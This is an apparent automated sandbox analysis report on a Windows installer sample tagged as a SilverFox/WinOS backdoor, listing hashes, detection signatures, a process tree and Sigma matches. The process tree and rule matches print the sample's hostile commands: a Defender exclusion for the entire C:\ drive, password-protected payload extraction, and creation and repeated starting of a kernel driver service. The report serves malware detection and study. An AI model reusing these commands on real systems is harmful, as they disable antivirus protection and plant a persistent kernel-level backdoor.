
Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.8.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_2.0.8.exe
renamed because original name is a hash value
Original sample name:_2.0.8.exe
Analysis ID:1579795
MD5:65296edf39a492d0d9dbe2c7b6735df7
SHA1:b256b2f4f2537239b244e131c33418bbf2723b8b
SHA256:07287146cb055a3a593306fcb09d498f6b2a533f68aeb43e28ebccd2fc1c1e3f
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_2.0.8.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" MD5: 65296EDF39A492D0D9DBE2C7B6735DF7)
    • #U5b89#U88c5#U52a9#U624b_2.0.8.tmp (PID: 6504 cmdline: "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 5468 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 4796 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.8.exe (PID: 4984 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT MD5: 65296EDF39A492D0D9DBE2C7B6735DF7)
        • #U5b89#U88c5#U52a9#U624b_2.0.8.tmp (PID: 6564 cmdline: "C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$20490,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 7064 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6160 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2920 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4120 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5588 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2072 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4120 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5484 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3652 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5628 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1784 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5588 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 320 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5544 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2132 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6508 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6984 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6332 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4676 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6384 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3524 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1784 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5376 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3652 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3292 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1476 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5468 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2300 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5676 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5260 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5468 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5628 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5616 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6084 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6104 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1868 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5628 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1784 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2200 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1848 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6532 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6508 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2132 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1396 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5676 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6152 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3176 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5588 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6104 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2072 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ParentProcessId: 6504, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5468, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 4120, ProcessName: sc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ParentProcessId: 6504, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5468, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2920, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 4120, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp" /SL5="$1046E,4752973,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.8.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ParentProcessId: 6504, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 5468, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 81.4% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2115894094.0000000003480000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2115992185.0000000000AC0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp | Code function: 6_2_6C77AEC0 FindFirstFileA,FindClose,FindClose,6_2_6C77AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00896868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00896868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00897496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00897496
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000003.2063536455.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
